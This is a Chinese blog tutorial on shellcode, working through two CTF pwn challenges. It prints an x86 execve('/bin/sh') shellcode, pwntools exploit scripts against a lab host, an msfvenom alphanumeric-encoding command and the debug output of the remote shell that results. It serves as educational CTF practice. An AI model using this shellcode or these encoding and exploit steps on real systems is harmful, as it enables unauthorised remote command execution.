Hvnt3r
Hvnt3r

ShellCode的编写和利用

ShellCode的编写和利用

原文链接:https://hvnt3r.top/2018/10/Shell-code的编写和利用/
在渗透测试和漏洞利用中,Shellcode是一个十分重要的部分,在二进制的安全研究中,Shellcode也充当着十分重要的角色,本文会记录我学习Shellcode的编写和利用原理。

在程序中嵌入Shellcode并执行

首先拿一道十分简单的PWN题来演示程序是如何执行Shellcode

文件下载

首先,这是一个32位的程序,我把它放到了32位的kali虚拟机中

gdb-peda$ checksec
CANARY    : ENABLED
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial

程序开启了NXCANARY,实际上并没有检查此程序开启的安全措施的必要,因为分析IDA中的伪C代码可知,此程序会将用户输入的数据当作汇编代码进行执行,代码如下:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // ST2C_4
  void *v4; // ST30_4
  int v5; // ST38_4
  char s; // [esp+3Ch] [ebp-84h]
  unsigned int v8; // [esp+BCh] [ebp-4h]

  v8 = __readgsdword(0x14u);
  v3 = open("/home/challenge/flag", 0);
  setbuf(_bss_start, 0);
  setbuf(stdout, 0);
  alarm(0x1Eu);
  v4 = mmap(0, 0x80u, 7, 34, -1, 0);
  memset(v4, 195, 0x7Fu);
  memset(&s, 0, 0x7Fu);
  puts("OpenCTF tyro shellcode challenge.\n");
  puts("Write me some shellcode that reads from the file_descriptor");
  puts("I supply and writes it to the buffer that I supply");
  printf("%d ... 0x%08x\n", v3, &s);
  read(0, v4, 0x20u);
  v5 = ((int (*)(void))v4)();
  puts(&s);
  return v5;
}

通过分析汇编代码可知程序会使用call eax的方式来运行用户的输入

.text:08048721                 mov     dword ptr [esp], offset format ; "%d ... 0x%08x\n"
.text:08048728                 call    _printf
.text:0804872D                 mov     dword ptr [esp+8], 20h ; nbytes
.text:08048735                 mov     eax, [esp+30h]
.text:08048739                 mov     [esp+4], eax    ; buf
.text:0804873D                 mov     dword ptr [esp], 0 ; fd
.text:08048744                 call    _read
.text:08048749                 mov     eax, [esp+30h]
.text:0804874D                 mov     [esp+34h], eax
.text:08048751                 mov     eax, [esp+34h]
.text:08048755                 call    eax         <================== Here
.text:08048757                 mov     [esp+38h], eax
.text:0804875B                 lea     eax, [esp+0C0h+s]
.text:0804875F                 mov     [esp], eax      ; s

因此我们可以吧要执行的汇编代码通过pwntools来输入到此程序中达到执行的目的,这里我们要输入的一些能达到某种执行效果的汇编代码即为shellcode,这里有一个网站,上面有很多经典又实用的shellcode,shell-storm.org,网站的维护者同时是ROPgadget的作者,话不多说,膜就完事了。

Jonathan Salwan

ShellCode的编写和利用_第1张图片

本程序为用户的输入开启了read(0, v4, 0x20u);即32个字节的空间,因此我们可以在这个网站上找到一个长度满足要求的shellcode以填充我们的输入:

#include 
#include 

unsigned char shellcode[] = \

"\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f"
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd"
"\x80";

main ()
{

    // When contains null bytes, printf will show a wrong shellcode length.

	printf("Shellcode Length:  %d\n", strlen(shellcode));

	// Pollutes all registers ensuring that the shellcode runs in any circumstance.

	__asm__ ("movl $0xffffffff, %eax\n\t"
		 	 "movl %eax, %ebx\n\t"
			 "movl %eax, %ecx\n\t"
			 "movl %eax, %edx\n\t"
			 "movl %eax, %esi\n\t"
			 "movl %eax, %edi\n\t"
			 "movl %eax, %ebp\n\t"
			 // Calling the shellcode
			 "call shellcode");
}

shellcode

\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80

我们可以直接使用pwntools攻击一下此程序,脚本如下:

from pwn import *
io=remote('192.168.229.140',10001)
shellcode='\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
print io.recv()
io.send(shellcode)
io.interactive()

运行程序即可执行/bin/sh进行远程交互,为了搞清楚这一段shellcode做了什么,我们需要将这一段shell code转换为汇编代码,将shellcode转换为汇编的方式有很多种,我这里使用的方法是用Ollydbg转换,首先,随便用OD打开一个二进制文件,随后复制shellcode的内容,再随意选中OD中汇编框中长度足够的区域,点击右键,选择二进制粘贴,把shellcode粘贴到文件中:

ShellCode的编写和利用_第2张图片

此时OD会自动把shellcode对应的数据转化为汇编代码:

31C9            xor ecx,ecx
F7E1            mul ecx
B0 0B           mov al,0xB
51              push ecx
68 2F2F7368     push 0x68732F2F
68 2F62696E     push 0x6E69622F
89E3            mov ebx,esp
CD 80           int 0x80

可见,这一段shell code调用了系统软中断,相关的详细信息在我之前的博文中有介绍:通过int 80h执行系统命令,这段shellcode就是设置好了调用系统函数的参数并调用的。

Shellcode变形

当然百分之99的情况下程序并不会像上面那个例子直接执行用户所给的代码,在BSides San Francisco CTF 2017b_64_b_tuff

文件下载

用IDA查看主要的逻辑:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char *s; // ST2C_4
  void *v5; // [esp+0h] [ebp-18h]
  void *buf; // [esp+4h] [ebp-14h]
  ssize_t v7; // [esp+8h] [ebp-10h]

  alarm(0xAu);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  v5 = mmap((void *)0x41410000, 0x1558u, 7, 34, 0, 0);
  printf("Address of buffer start: %p\n", v5);
  buf = malloc(0x1000u);
  v7 = read(0, buf, 0x1000u);
  if ( v7 < 0 )
  {
    puts("Error reading!");
    exit(1);
  }
  printf("Read %zd bytes!\n", v7);
  s = (char *)base64_encode((int)buf, v7, v5);
  puts(s);
  ((void (*)(void))v5)();
  return 0;
}

跟上一个例子类似,程序会将用户输入的代码执行,不过区别在于程序会先把用户输入的数据进行base64解码,那么问题来了,进行base64加密的时候只支持英文字母的大小写+/,但是在shellcode中有很多不可打印的字符,因此我们需要对shellcode进行一定的处理使得shellcodebase64解码后能正常的执行。

是时候祭出大杀器msfvenom了,msfvenom是kali下的一款神器,有很多好玩有趣的功能,感兴趣可以自己谷歌一下玩法,但是msfvenom只支持stdin的方式传参,因此我们用python加上管道操作向msfvenom传参,我们选用x86/alpha_mixed这个过滤器来生成只有大小写字母的shellcode,因为程序中是使用call eax调用shellcode的,因此我们需要将BufferRegister设置为EAX

.text:08048891                 call    _puts
.text:08048896                 add     esp, 10h
.text:08048899                 mov     eax, [ebp+var_18]
.text:0804889C                 call    eax     <=========== call shellcode
.text:0804889E                 mov     eax, 0
.text:080488A3                 mov     ecx, [ebp+var_4]
.text:080488A6                 leave

生成payload

⚡ root@kali  python -c 'import sys; sys.stdout.write("\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80")' | msfvenom -p - -e x86/alpha_mixed -a linux -f raw -a x86 --platform linux BufferRegister=EAX -o payload
Attempting to read payload from STDIN...
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 96 (iteration=0)
x86/alpha_mixed chosen with final size 96
Payload size: 96 bytes
Saved as: payload
 ⚡ root@kali  l
总用量 24K
drwxr-xr-x 2 root root 4.0K 10月 30 06:45 .
drwxr-xr-x 8 root root 4.0K 10月 18 03:25 ..
-rwxr-xr-x 1 root root 7.7K 1月  30  2018 b-64-b-tuff
-rw-r--r-- 1 root root  502 2月   1  2018 exp.py
-rw-r--r-- 1 root root   96 10月 30 06:45 payload
 ⚡ root@kali  cat payload 
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI01o9ygYqH0fk61CXVOtoD3rHaxto52pibNMYYsjmK0AA#

得到改造过的shellcode之后我们就可以通过脚本向程序传递shellcode了:

from pwn import *
from base64 import *
io=remote('192.168.229.140',10001)
context(os='linux', arch='i386', log_level='debug')
shellcode=b64decode('PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI01o9ygYqH0fk61CXVOtoD3rHaxto52pibNMYYsjmK0AA')
print io.recv()
io.sendline(shellcode)
io.interactive()

运行结果:

⚡ root@kali  python 1.py
[+] Opening connection to 192.168.229.140 on port 10001: Done
[DEBUG] Received 0x24 bytes:
    'Address of buffer start: 0x41410000\n'
Address of buffer start: 0x41410000

[DEBUG] Sent 0x49 bytes:
    00000000  3d 82 08 20  82 08 20 82  08 20 82 08  20 8e d0 66  │=·· │·· ·│· ··│ ··f│
    00000010  30 17 3f 40  34 02 40 00  43 60 01 d8  10 74 04 10  │0·?@│4·@·│C`··│·t··│
    00000020  01 5c ff 00  06 e2 48 d3  5a 3d ca 06  2a 1f 47 e4  │·\··│··H·│Z=··│*·G·│
    00000030  eb 50 97 54  eb 68 0f 7a  c7 6b 1b 68  e7 6a 62 6c  │·P·T│·h·z│·k·h│·jbl│
    00000040  d3 18 62 c8  e6 2b 40 00  0a                        │··b·│·+@·│·│
    00000049
[*] Switching to interactive mode
[DEBUG] Received 0x5e bytes:
    00000000  3d 82 5e 48  20 82 5e 48  20 82 5e 48  20 82 5e 48  │=·^H│ ·^H│ ·^H│ ·^H│
    00000010  20 8e d0 66  30 5e 57 3f  40 34 5e 42  40 5e 40 43  │ ··f│0^W?│@4^B│@^@C│
    00000020  60 5e 41 d8  5e 50 74 5e  44 5e 50 5e  41 5c ff 5e  │`^A·│^Pt^│D^P^│A\·^│
    00000030  40 5e 46 e2  48 d3 5a 3d  ca 5e 46 2a  5e 5f 47 e4  │@^F·│H·Z=│·^F*│^_G·│
    00000040  eb 50 97 54  eb 68 5e 4f  7a c7 6b 5e  5b 68 e7 6a  │·P·T│·h^O│z·k^│[h·j│
    00000050  62 6c d3 5e  58 62 c8 e6  2b 40 5e 40  5e 4a        │bl·^│Xb··│+@^@│^J│
    0000005e
=\x82^H \x82^H \x82^H \x82^H \x8e�f0^W?@4^B@^@C`^A�^Pt^D^P^A\\xff^@^F�H�Z=�^F*^_G��P\x97T�h^Oz�k^[h�j[DEBUG] Received 0x74 bytes:
    'Read 73 bytes!\n'
    'PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI01o9ygYqH0fk61CXVOtoD3rHaxto52pibNMYYsjmK0AACg==\n'
Read 73 bytes!
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI01o9ygYqH0fk61CXVOtoD3rHaxto52pibNMYYsjmK0AACg==
$ ls
[DEBUG] Sent 0x3 bytes:
    'ls\n'
[DEBUG] Received 0x4 bytes:
    'ls^J'
ls^J[DEBUG] Received 0x14 bytes:
    'b-64-b-tuff  exp.py\n'
b-64-b-tuff  exp.py
[*] Got EOF while reading in interactive
$ 
[*] Interrupted
[*] Closed connection to 192.168.229.140 port 10001

你可能感兴趣的:(Windows安全)

  • 某金融企业生产环境下信创数据库运维管理规范 罗伯特之技术屋 VIP专栏数据库金融运维
    数据是企业的生命线,企业为了保障数据库的稳定运行和数据的安全,设计一套数据库运维管理规范非常关键。信创浪潮来临后,在金融业中,IT技术部门更应尽快熟悉掌握信创数据库的管理技术,并形成规范化的数据库运维管理体系。信创数据库的运维管理,更需做好规划配置管理、监控管理、容灾备份管理、安全管理,并形成规范。合理的运维管理规范不仅能够提高信创数据库的管理效率和运行性能,还能够提高信创数据库的稳定性,保障数据
  • python pygame教程_【Python】Pygame入门 weixin_39677419 pythonpygame教程
    Pygame的历史Pygame是一个利用SDL库的写的游戏库,SDL呢,全名SimpleDirectMediaLayer,是一位叫做SamLantinga的大牛写的,据说他为了让Loki(致力于向Linux上移植Windows的游戏的一家大好人公司,可惜已经倒闭,唉好人不长命啊……)更有效的工作,创造了这个东东。SDL是用C写的,不过它也可以使用C++进行开发,当然还有很多其它的语言,Pygame
  • 斯尔福智慧实验室三阶段详解 斯尔福实验室设备 大数据
    未来二十时间,实验室智能化是各类实验室的发展方向。在这样的时代背景下,斯尔福提出设计建造更安全、舒适、高效、节能的智慧实验室,是整个实验室设计、建设的核心目地。斯尔福将智慧实验室分为3个阶段。如何实现实验室信息数据智能化,LEMS实验室智能环境设施管理系统,以实验室为中心,采用先进的计算机网络技术、数据库技术以及三维仿真技术,将实验室整体环境,包括设备。人员。危险物等数据,结合实验室用户标准化管理
  • c++使用_beginthreadex创建线程 梦想患者 功能开发小技巧c++Thread
    记录使用_beginthreadex(),来创建线程。方便后期的使用。创建一个线程相关函数介绍unsignedlong_beginthreadex(void*security,//安全属性,为NULL时表示默认安全性unsignedstack_size,//线程的堆栈大小,一般默认为0unsigned(_stdcall*start_address)(void*),//所要启动的线程函数void*a
  • 2024年网络安全工程师的发展前景如何?红利还有吗? 程序员小予 web安全网络安全网络安全系统安全计算机网络密码学
    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包2021年7月12日工信部发布的《网络安全产业高质量发展三年行动计划(2021-2023年)》,文件中提出,2023年网络安全产业规模超过2500亿元,年复合增长率超过15%。一批网络安全关键核心技术实现突破,达到先进水平。网络安全技术创新能力明显提高,产品和服务水平不断提升,经济社会网络安全需求加快释放,产融合作精准高效,网络安全人
  • 数据库服务器运维最佳实践 bigbig猩猩 数据库运维服务器
    数据库服务器运维是确保数据库系统高效、稳定和安全运行的关键环节。随着信息技术的不断发展,数据库系统的规模和复杂性不断增加,对运维工作的要求也越来越高。以下将从硬件选择、操作系统和文件系统优化、数据库版本选择、参数优化、数据备份与恢复、性能监控与调优、安全管理以及高可用性和灾难恢复等方面详细介绍数据库服务器运维的最佳实践。一、硬件选择1.CPU选择多核高主频的处理器是保障数据库性能的基础。数据库服务
  • web安全学习笔记(1) 头发的天敌是代码 web安全学习笔记web安全学习笔记
    一、网络安全分支1.web安全——网站2.二进制安全物联网安全工控安全二、网站是如何搭建起来的1.服务器服务器与我们的家庭使用电脑有什么区别?①没有显卡②CPU+内存不同于家庭电脑2.操作系统家庭系统:WindowsXPWindows7Windows8Windows9Windows10Windows11服务器操作系统:Windows2000Windows2003Windows2008Windows
  • oracle数据库安装和配置:详细教程 liyy614 oracle人工智能AI编程数据库ai编程
    安装和配置Oracle数据库是一个较为复杂的过程,需要按照一定的步骤来操作。以下是基于OracleDatabase19c的安装和配置教程,适用于Windows环境。请根据你的具体环境和版本进行适当的调整。1.下载Oracle数据库软件访问Oracle官方网站下载OracleDatabase19cExpressEdition或EnterpriseEdition的安装包。确保下载的版本与你的操作系统兼
  • Web安全与网络安全:SQL漏洞注入 hong161688 web安全sqloracle
    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
  • 科技园区及科研实验室智能消防安全管控系统 三儿儿儿 物联网人工智能数据分析
    实验室是研究所开展科研活动的重要场所,保障实验室安全是科研工作顺利开展的必要条件和坚实基础,长期以来,实验室安全工作涉及危险化学品的监督管理,化学品的技术安全管理,以及实验室消防、环保等多方面的内容。实验室存放和使用的化学试剂和气瓶种类繁多,且极具危险性,一旦实验环境中存在不安全因素,便可能引发火灾、爆炸等安全事故,而传统的安全管理模式以人的管理和主观经验为主,主观性判断占据主导因素安全管理的工作
  • 快速上手指南:在Windows系统中下载Ollama,一键启动大模型体验! 再不会AI就不礼貌了 人工智能学习方法大数据llama语言模型
    1.下载ollama官网下载安装:ollama.com2.拉取大模型llama3.1终端中输入ollamapullllama3.1,等待安装3.运行llama3.1ollamarunllama3.1接下来就可以和模型对话了退出/bye运行/?查看更多聊天中命令其他ollamagithub:github.com/ollama/olla…常用命令删除模型:ollamarmollamarmllama3.
  • 网络安全工程师自主学习计划表(具体到阶段目标) 大模型综述 web安全网络安全系统安全安全学习
    前言接下来我将给大家分享一份网络安全工程师自学计划指南,全文将从学习路线、学习规划、学习方法三个方向来讲述零基础小白如何通过自学进阶网络安全工程师,全文篇幅有点长,同学们可以先点个收藏,以免日后错过了。目录前言学习路线学习规划初级1、网络安全理论知识(2天)2、渗透测试基础(1周)3、操作系统基础(1周)4、计算机网络基础(1周)5、数据库基础操作(2天)6、Web渗透(1周)中级、高级7、脚本编
  • 新加坡 - A Fine City 小土也
    前两天和朋友吃饭,聊到了各自对新加坡的看法,发现这个城市真是让人又爱又恨。我曾经在新加坡学习4年,后又去英国学习3年,期间也去过不少欧洲的城市。和其它去过的城市相比,新加坡可以说是最安全的一个城市了,犯罪率非常低,真的达到了夜不闭户的程度。曾经住过寄宿家庭,晚上真的不锁门。然而,这种安全感对于人们的生活和商业发展固然是非常好的,但也造成了人们自由度的被压缩。比如,新加坡全面禁烟,就连室外的遮雨棚下
  • Java基础——深入理解Java中的多线程(超级详细,值得你看) 2401_84558508 作者\/java开发语言
    开发中优先选择实现Runnable方式原因:实现的方式没有类的单继承性的局限性实现的方式更适合来处理多个线程共享数据的情况相同点:都需要重写run(),将线程要执行的代码声明在run()方法中线程的生命周期解决线程安全问题;使用同步代码块packagecom.haust.java;/*出现线程安全问他的解决方法:当一个线程a在操作ticket的时候,其他线程不能参与进来,直到线程参与进来,也操作完
  • Windows下的TCP UDP网络调试工具-NetAssist以及Linux下的nc网络调试工具_tcp网络调试工具(1) 2401_83947434 程序员运维学习面试
    为了做好运维面试路上的助攻手,特整理了上百道【运维技术栈面试题集锦】,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,小到shell、MySQL,大到K8s等云原生技术栈,不仅适合运维新人入行面试需要,还适用于想提升进阶跳槽加薪的运维朋友。本份面试集锦涵盖了174道运维工程师面试题128道k8s面试题108道shell脚本面试题200道Linux面试题51道docker面试题35道Je
  • Linux系统管理及应用软件实施与运维 无敌霸王龙 运维linux服务器centos数据库mysql
    一、引言随着信息技术的迅猛发展,Linux操作系统在企业和个人用户中的应用越来越广泛。Linux以其开放源代码、稳定可靠、安全性高等特点成为许多用户的首选操作系统。而随着Linux应用范围的不断扩大,对于Linux系统管理及应用软件的实施与运维也越来越受到重视。本文将介绍Linux系统管理的基本概念、常用工具及技术,以及针对不同应用场景下的实施与运维策略。通过对Linux系统管理的深入理解,可以帮
  • 速盾:你知道高防 IP 和高防 CDN 的区别吗? 速盾cdn tcp/ip网络安全
    在当今网络安全形势日益严峻的情况下,网站的安全防护成为了企业和个人关注的焦点。高防IP和高防CDN作为两种常见的网络安全防护手段,被广泛应用于网站的安全防护中。那么,高防IP和高防CDN有什么区别呢?防护网站哪个更好呢?一、高防IP和高防CDN的定义高防IP高防IP是一种针对IP地址的网络安全防护服务。它通过将用户的网站IP地址替换为高防IP地址,将攻击流量引流到高防IP上进行清洗和过滤,只将合法
  • linux-用户与权限管理-用户管理 Flying_Fish_Xuan linux运维服务器
    Linux用户与权限管理——用户管理详解在Linux系统中,用户管理和权限控制是保证系统安全和资源有效利用的基础。用户管理涉及到创建用户、删除用户、修改用户属性、用户组管理等内容。1.Linux用户体系概述在Linux系统中,所有操作都与用户相关联。用户可以是人、进程或系统程序,操作系统通过用户身份来进行权限和资源的分配。Linux系统将用户分为以下几类:超级用户(Superuser):通常是ro
  • jmeter远程启动配置 雪霁_ 性能测试压力测试jmeterlinux
    前提条件保持windows端、linux端jdk版本一致配置linux压力机(配置agent)修改文件jmeter.properties,打开注释server_port开启端口(默认1099);打开注释,修改server.rmi.ssl.disable=false为true运行命令,./jmeter-server-Djava.rmi.server.hostname=10.0.0.48(ip为lin
  • Windows和浏览器的命令与快捷键 伍嘉源 Windowswindows
    Windows和浏览器的命令与快捷键一、运行常用命令二、cmd常用命令(cmd的命令是运行的命令的超集)三、Windows快捷键1、Win键2、Ctrl键3、Alt键4、F键四、浏览器快捷键五、关闭Windows防火墙、安全中心和自动更新一、运行常用命令1.基本命令cmd打开命令提示符(cmd命令行控制台)control打开控制面板regedit打开注册表编辑器2.打开系统自带工具mspaint打
  • 童年期早期至中期:适应不良模式 瓦尔妲的星辰
    (摘自《儿童心理学手册》第六版第三卷第9章【自我】)适应不良模式依恋研究对三类与非安全型依恋模式相关的不理想的父母养育风格做了进一步的区分。这三类父母养育的儿童被描述为(1)回避型依恋(2)矛盾型依恋(3)紊乱型依恋焦虑-回避型风格使幼儿感到无法接近母亲,无法获得母亲的照料和正性情感。儿童觉得母亲无法及时满足自己的需要,当儿童痛苦时,母亲会转身离开,甚至大光其火。由于感受不到爱,儿童切断了自我与威
  • MAC 访问 Windows 共享文件夹 云满笔记 #mac_windowsmac网络共享windows
    这里填写标题1.MAC访问Windows共享文件夹1.1.命令行访问方法1.MAC访问Windows共享文件夹点击Finder->前往->连接服务器->注册用户Administrator。打开Finder应用,在左侧列表中就可以看到共享文件夹了。1.1.命令行访问方法执行上述操作后,远程目录被挂载在/Volumes/目录下:$cd/Volumes$lltotal32drwx------1macst
  • 运行CrossOver应用程序的四种方法 想干啥就干啥
    众所周知,在MacOS里面是不能运行exe执行文件的,要运行exe文件,必须在CrossOver运行的情况下,在操作界面上或者使用“运行命令”才行。在CrossOverforMac软件中,应用程序分为两种——Windows自带的exe执行文件和从外部安装的应用程序。本章节小编将教会小伙伴如何运行CrossOver里的应用程序。一、在“程序”区域中运行在CrossOver操作界面上,“程序”区域里的
  • 《西尔斯育儿经》读书笔记P151-P160 罗宝妈妈
    读到这几页,真的解了我的燃眉之急,我家罗宝不怎么善于表达自己的内心,我一直觉得她缺乏安全感,包括用哭泣来表达自己的需求和不满,我和她爸有时候也觉得这孩子,为什么动不动就自己一个人跑到房间里,不愿意与任何人交谈,这也说明父母与孩子之间的关系。善于表达情感的婴儿和敏感地作出回应的父母能够把一个双赢的组合带入孩子的学步期,如果在第一年宝宝发出的暗示得到了倾听和理解,到了学步期她就能够很好的表达自己,在孩
  • 「漏洞复现」契约锁电子签章平台 add 远程命令执行漏洞 鲨鱼辣椒丶D 漏洞复现web安全
    0x01免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!0x02产品介绍契约锁电子签章平台是上海亘岩网络科技有限公司推出的一套数字签章解决方案。契约锁为中大型组织提供“数
  • 如何在 Windows PC 上恢复已删除的音频文件 分享者花花 手机恢复文件恢复数据恢复软件智能手机word媒体macosiphone手机笔记本电脑
    乐为我们的生活带来欢乐及其奇迹;无论是音乐、播客、音频学习材料还是音频文件。您是否想知道如何恢复您意外或有意从PC中删除的已删除音频文件?别担心,这篇文章是为你准备的。有时,由于与文件传输、病毒损坏、意外删除或任何其他原因相关的原因,音频文件会丢失、损坏或删除。然而,这意味着我们丢失了mp3、wav、aiff、wma或其他格式的有价值的音频文件。同时,我们了解在WindowsPC上恢复已删除的音频
  • Web安全与网络安全:SQL漏洞注入 bigbig猩猩 typescriptvue.js前端
    Web安全与网络安全:SQL漏洞注入引言在Web安全领域,SQL注入漏洞(SQLInjectionVulnerability)是一种极具破坏性的安全威胁。它允许攻击者通过向Web应用程序的输入字段中插入或“注入”恶意的SQL代码片段,从而操纵后台数据库系统,执行未授权的数据库查询,甚至可能获取数据库管理权限,进而对整个系统造成严重的安全损害。本文将从SQL注入的原理、分类、危害及防御策略等方面进行
  • Redis中的AOF重写过程及其实际应用 CopyLower Java学习Redisredisjava数据库
    引言在Redis中,持久化是确保数据安全和稳定运行的关键部分。Redis提供了两种持久化方式:RDB快照和AOF(AppendOnlyFile)日志。相比RDB快照,AOF能够更频繁地保存数据变更,并且在服务器崩溃后能够更快地恢复数据。然而,随着时间的推移,AOF文件可能会变得越来越大,从而影响Redis的性能。为了应对这一问题,Redis引入了AOF重写机制,通过优化和压缩AOF文件的大小,确保
  • MongoDB C++库编译,windows平台+VS2015(QT中也可以用) hp_cpp C++
    编译准备工作:(1)mongo-c-driver下载地址:https://github.com/mongodb/mongo-c-driver/releases下载最新版:mongo-c-driver1.12.0的Soucecode版(2)mongodb/mongo-cxx-driver下载地址:https://github.com/mongodb/mongo-cxx-driver/releases
  • 电脑切换大小写出现图标提示,如何取消? famous_pengfei 电脑笔记本电脑windows
    对于追求高效率的电脑用户而言,每一分一秒的专注都至关重要。然而,有时候Windows操作系统中一些“贴心”的小功能,比如切换大小写时屏幕上出现的图标提示,不经意间就可能打断我们的思路,影响流畅的工作节奏。尤其对于那些经常需要切换大小写进行编程、写作或数据处理的专业人士来说,这样的提示不仅多余,甚至可能变成一种干扰。好消息是,这些系统默认的功能大多是可以自定义的,包括这个大小写切换的图标提示。如果你
  • ztree设置禁用节点 3213213333332132 JavaScriptztreejsonsetDisabledNodeAjax
    ztree设置禁用节点的时候注意,当使用ajax后台请求数据,必须要设置为同步获取数据,否者会获取不到节点对象,导致设置禁用没有效果。 $(function(){ showTree(); setDisabledNode(); });
  • JVM patch by Taobao bookjovi javaHotSpot
    在网上无意中看到淘宝提交的hotspot patch,共四个,有意思,记录一下。   7050685:jsdbproc64.sh has a typo in the package name 7058036:FieldsAllocationStyle=2 does not work in 32-bit VM 7060619:C1 should respect inline and
  • 将session存储到数据库中 dcj3sjt126com sqlPHPsession
    CREATE TABLE sessions ( id CHAR(32) NOT NULL, data TEXT, last_accessed TIMESTAMP NOT NULL, PRIMARY KEY (id) );   <?php /** * Created by PhpStorm. * User: michaeldu * Date
  • Vector 171815164 vector
    public Vector<CartProduct> delCart(Vector<CartProduct> cart, String id) { for (int i = 0; i < cart.size(); i++) { if (cart.get(i).getId().equals(id)) { cart.remove(i);
  • 各连接池配置参数比较 g21121 连接池
            排版真心费劲,大家凑合看下吧,见谅~     Druid DBCP C3P0 Proxool 数据库用户名称 Username Username User   数据库密码 Password Password Password   驱动名
  • [简单]mybatis insert语句添加动态字段 53873039oycg mybatis
          mysql数据库,id自增,配置如下:       <insert id="saveTestTb" useGeneratedKeys="true" keyProperty="id" parameterType=&
  • struts2拦截器配置 云端月影 struts2拦截器
    struts2拦截器interceptor的三种配置方法 方法1. 普通配置法 <struts>     <package name="struts2" extends="struts-default">         &
  • IE中页面不居中,火狐谷歌等正常 aijuans IE中页面不居中
    问题是首页在火狐、谷歌、所有IE中正常显示,列表页的页面在火狐谷歌中正常,在IE6、7、8中都不中,觉得可能那个地方设置的让IE系列都不认识,仔细查看后发现,列表页中没写HTML模板部分没有添加DTD定义,就是<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3
  • String,int,Integer,char 几个类型常见转换 antonyup_2006 htmlsql.net
    如何将字串 String 转换成整数 int? int i = Integer.valueOf(my_str).intValue(); int i=Integer.parseInt(str); 如何将字串 String 转换成Integer ? Integer integer=Integer.valueOf(str); 如何将整数 int 转换成字串 String ? 1.
  • PL/SQL的游标类型 百合不是茶 显示游标(静态游标)隐式游标游标的更新和删除%rowtyperef游标(动态游标)
    游标是oracle中的一个结果集,用于存放查询的结果;   PL/SQL中游标的声明; 1,声明游标 2,打开游标(默认是关闭的); 3,提取数据 4,关闭游标     注意的要点:游标必须声明在declare中,使用open打开游标,fetch取游标中的数据,close关闭游标   隐式游标:主要是对DML数据的操作隐
  • JUnit4中@AfterClass @BeforeClass @after @before的区别对比 bijian1013 JUnit4单元测试
    一.基础知识 JUnit4使用Java5中的注解(annotation),以下是JUnit4常用的几个annotation: @Before:初始化方法   对于每一个测试方法都要执行一次(注意与BeforeClass区别,后者是对于所有方法执行一次)@After:释放资源  对于每一个测试方法都要执行一次(注意与AfterClass区别,后者是对于所有方法执行一次
  • 精通Oracle10编程SQL(12)开发包 bijian1013 oracle数据库plsql
    /* *开发包 *包用于逻辑组合相关的PL/SQL类型(例如TABLE类型和RECORD类型)、PL/SQL项(例如游标和游标变量)和PL/SQL子程序(例如过程和函数) */ --包用于逻辑组合相关的PL/SQL类型、项和子程序,它由包规范和包体两部分组成 --建立包规范:包规范实际是包与应用程序之间的接口,它用于定义包的公用组件,包括常量、变量、游标、过程和函数等 --在包规
  • 【EhCache二】ehcache.xml配置详解 bit1129 ehcache.xml
    在ehcache官网上找了多次,终于找到ehcache.xml配置元素和属性的含义说明文档了,这个文档包含在ehcache.xml的注释中! ehcache.xml : http://ehcache.org/ehcache.xml ehcache.xsd : http://ehcache.org/ehcache.xsd ehcache配置文件的根元素是ehcahe   ehcac
  • java.lang.ClassNotFoundException: org.springframework.web.context.ContextLoaderL 白糖_ javaeclipsespringtomcatWeb
    今天学习spring+cxf的时候遇到一个问题:在web.xml中配置了spring的上下文监听器: <listener> <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class> </listener>  随后启动
  • angular.element boyitech AngularJSAngularJS APIangular.element
    angular.element 描述:     包裹着一部分DOM element或者是HTML字符串,把它作为一个jQuery元素来处理。(类似于jQuery的选择器啦)     如果jQuery被引入了,则angular.element就可以看作是jQuery选择器,选择的对象可以使用jQuery的函数;如果jQuery不可用,angular.e
  • java-给定两个已排序序列,找出共同的元素。 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.List; public class CommonItemInTwoSortedArray { /** * 题目:给定两个已排序序列,找出共同的元素。 * 1.定义两个指针分别指向序列的开始。 * 如果指向的两个元素
  • sftp 异常,有遇到的吗?求解 Chen.H javajcraftauthjschjschexception
    com.jcraft.jsch.JSchException: Auth cancel at com.jcraft.jsch.Session.connect(Session.java:460) at com.jcraft.jsch.Session.connect(Session.java:154) at cn.vivame.util.ftp.SftpServerAccess.connec
  • [生物智能与人工智能]神经元中的电化学结构代表什么? comsci 人工智能
